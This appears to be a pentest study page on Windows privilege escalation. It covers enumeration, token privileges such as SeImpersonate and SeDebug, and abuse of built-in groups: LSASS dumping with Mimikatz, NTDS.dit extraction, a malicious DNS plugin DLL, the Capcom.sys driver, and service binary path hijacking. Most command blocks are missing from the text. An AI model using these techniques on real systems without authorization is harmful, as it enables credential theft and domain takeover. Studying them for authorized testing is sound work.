Windows Privilege Escalation (TBC)
Introduction
Elevating privileges on a Windows system is a crucial step after gaining initial access. By moving from a low-privilege account to one with administrative rights or even SYSTEM-level access, you open the door to persistence, deeper network reconnaissance, and further lateral movement.
The general goal of Windows privilege escalation is gain the privilege of the Local Administrators group or the NT AUTHORITY\SYSTEM LocalSystem account.
While there are many tools available, it’s always important to understand what they do and how to manually verify their output. Tools can provide a huge amount of data. While they speed up the process, take time to interpret the output to avoid information overload. Examples of the tools we can use:
Seatbelt
winPEAS
PowerUp/SharpUp (C# version of PowerUp)
JAWS
SessionGopher
Watson
LaZagne
Windows Exploit Suggester - Next Generation
Sysinternals Suite
Initial Enumeration
Begin your assessment by collecting key system details:
Operating System & Version: Identify whether you’re dealing with a workstation or server (e.g., Windows 7, Windows 10, Server 2008, 2012, 2016, 2019, etc.). Knowing the OS type and version can guide your choice of tools and hint towards potential public exploits.
Running Services: Investigate services, especially those running as NT AUTHORITY\SYSTEM or with administrative privileges. Misconfigured or vulnerable services can be prime targets.
Environment Variables: Use the
setcommand to print the current environment variables. These can reveal configuration details and potential weaknesses.Installed Programs & Running Processes: Processes running on the system, even if not running as an administrator, might have tokens that can be abused for privilege escalation.
Named Pipes
Named pipes are a common method for inter-process communication. Since they reside in memory, their permissions and usage can offer clues for further escalation:
Using Sysinternals:
Using PowerShell:
After listing the pipes, check specific permissions (for example, on the LSASS pipe) with:
Network & System Information
Another essential thing is understanding your target environment. Start by gathering basic network and system details:
Network Configuration:
ipconfig /allarp -aroute print
Security Services: Check if Microsoft Defender is active or if AppLocker is enforcing policies to understand what you are permitted and not permitted to do:
Gathering User & Group Information
Collecting detailed user and group data helps in mapping out the system’s security posture. Useful commands include:
Processes & Environment:
Hotfixes:
CMD:
wmic qfePowerShell:
Get-HotFix | ft -AutoSize
Installed Programs:
CMD:
wmic product get namePowerShell:
Get-WmiObject -Class Win32_Product | select Name, Version
Network Services & User Details:
Windows Privileges
Privileges in Windows define what actions an account can perform. Every security principal (users, computers, processes) is identified by a unique SID.
Every process in Windows runs with an access token that details the security context of the process. These tokens, although stored in memory, can sometimes be exploited, especially if they have privileges like SeImpersonate.
Sometimes, certain privileges may be assigned but disabled. In such cases, PowerShell scripts, PoCs can be found online, can help you enable these privileges, ensuring you can leverage them during your escalation efforts.
SeImpersonate & SeAssignPrimaryToken
The SeImpersonate privilege allows a process to assume the security context of another user. Attackers can leverage this "Potato style" technique to gain SYSTEM-level access by tricking a privileged process into passing its token.
Common Tools:
JuicyPotato (May not work on modern servers)
PrintSpoofer
SeDebugPrivilege
The SeDebugPrivilege lets a user debug and access the memory of processes, such as LSASS, which holds user credentials.
Memory Dumping:
Use ProcDump from the Sysinternals Suite to dump LSASS memory:
Extracting Credentials with Mimikatz:
Launch Mimikatz and run:
In cases where tool uploads are limited, you might use RDP and Task Manager to generate process dumps using the GUI.
SeTakeOwnershipPrivilege
This privilege allows you to take ownership of any securable object such as files, registry keys, and services. This is particularly useful if you encounter files or objects with restricted access.
Example Scenario:
Suppose you find a file
cred.txtunder a restricted share and lack access. First, check its details:Then, take ownership:
Finally, grant yourself full access:
Changing ownership and permissions can disrupt system functionality. Always ensure you have proper authorization and understand the potential impact of these actions.
Privileges via Built-in Groups
Privileges in Windows aren’t just assigned to individual accounts—group memberships can grant powerful rights as well. Using the command:
you can quickly see which built-in groups you belong to. Below we examine several key groups that can be exploited:
Backup Operators
Membership in this group grants the SeBackup and SeRestore privileges.
With SeBackupPrivilege, you can traverse any folder and list its contents, even when no explicit access control entry (ACE) exists for your account. However, instead of the standard copy command, you must copy files programmatically while specifying the
FILE_FLAG_BACKUP_SEMANTICSflag. A PoC such as “SeBackupPrivilege” can be used to facilitate this. A PoC named SeBackupPrivilege is available to help achieve this.Depending on the server settings, you may need to spawn an elevated CMD prompt (to bypass UAC) before enabling this privilege. If the privilege is disabled, it can be enabled with:
A practical use case is attacking a Domain Controller by copying the NTDS.dit file, which contains NTLM hashes for all domain user and computer objects. Since NTDS.dit is locked and not accessible by unprivileged users, you can use the Windows diskshadow utility to create a shadow copy of the C drive (exposing it as, say, drive E:). In this shadow copy, NTDS.dit is not in use. Then, using the Copy-FileSeBackupPrivilege cmdlet, you can bypass the ACL and copy NTDS.dit locally.
It also lets you back up the SAM and SYSTEM registry hives, which can then be used with tools like Impacket's
secretsdump.pyto extract offline credentials. Keep in mind, however, that if a file or folder has an explicit deny entry for your user or one of your groups, this method will still be blocked.Once you have the NTDS.dit file, you can extract Active Directory account credentials using one of two methods:
Using DSInternals:
Using secretsdump.py:
Another option is to leverage the built-in utility robocopy in backup mode. Unlike the standard copy command, robocopy can compare files and remove files no longer present in the source. For example:
Event Log Readers
If auditing is enabled, Windows logs process creation events (including command line details) as event ID 4688 in the Security log. Members of the Event Log Readers group can access these logs, which may contain valuable information such as passwords or sensitive parameters. You can query these events using:
Other logs, like the PowerShell Operational log, may also contain sensitive information.
DnsAdmins
Members of the DnsAdmins group have access to DNS configuration and data across the network. Because the DNS service runs as NT AUTHORITY\SYSTEM and supports custom plugins, an attacker in this group can potentially escalate privileges, especially on Domain Controllers or dedicated DNS servers.
Steps:
DNS management operates over RPC.
The registry key
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDllcan be populated to load a custom DLL without path verification.Using the
dnscmdutility, you can set this key. Upon restarting the DNS service, the DLL will be loaded.
Example:
Generate a malicious DLL with msfvenom:
Upload the DLL to the target.
Load the custom DLL:
Restarting the DNS service is required for the attack to take effect. Verify your permissions with:
To restart the service (if allowed):
After the attack, remember to clean up the registry setting:
An alternative exploitation vector involves disabling the global query block list and creating a WPAD record, every machine running WPAD with default settings will have its traffic proxied through your attack machine. For example:
Hyper-V Administrators
The Hyper-V Administrators group has full access to Hyper-V features. In environments where Domain Controllers are virtualized, administrators in this group could effectively gain Domain Admin privileges. They can clone live Domain Controllers and mount the virtual disk offline to extract the NTDS.dit file, thus retrieving NTLM hashes for all domain users.
Additionally, when a virtual machine is deleted, the vmms.exe process restores the original permissions on the corresponding
.vhdxfile as NT AUTHORITY\SYSTEM. By deleting the.vhdxfile and creating a hard link to a protected SYSTEM file (one you have full permissions for), you may be able to escalate your privileges.Note, however, that this vector has been mitigated by the March 2020 Windows security updates.
Print Operators
The Print Operators group is highly privileged. Its members receive the SeLoadDriverPrivilege, enabling them to manage, create, share, and delete printers connected to a Domain Controller, as well as log on locally and even shut down the Domain Controller. Make sure to check for the privileges in an elevated session. You might need to bypass UAC (for instance, using techniques from the UACMe repository) or open an elevated command shell using the credentials of a Print Operators member.
The vulnerable driver Capcom.sys is well known for allowing any user to execute shellcode with SYSTEM privileges. You can exploit this by using the PoC EnableSeLoadDriverPrivilege.cpp. First, compile the PoC:
Then download the Capcom.sys driver (saving it to, for example,
C:\Tools\Capcom.sys) and add a reference to it under your HKEY_CURRENT_USER tree:
Verify that the driver is loaded:
Finally, run a PoC such as ExploitCapcom to trigger a SYSTEM shell. If GUI access isn’t available, modify the PoC to, for example, yield a reverse shell.
Tools like EoPLoadDriver can automate this entire process and you would have to only run ExploitCapcom.
Server Operators
The Server Operators group allows its members to administer Windows servers (including Domain Controllers) without needing full Domain Admin privileges. Membership confers not only SeBackup and SeRestore privileges but also control over local services.
Example Scenario: Examine the AppReadiness service, confirm that it runs as SYSTEM using:
You can change the service’s binary path to execute a command that adds your current user to the local Administrators group:
Then, attempt to start the service:
Should fail to run (as expected), but if you then check the Administrators group membership, you’ll see that the command executed successfully.
Modifying service configurations on production systems can be very disruptive. Always ensure you have the proper authorization and understand the impact before proceeding.
Last updated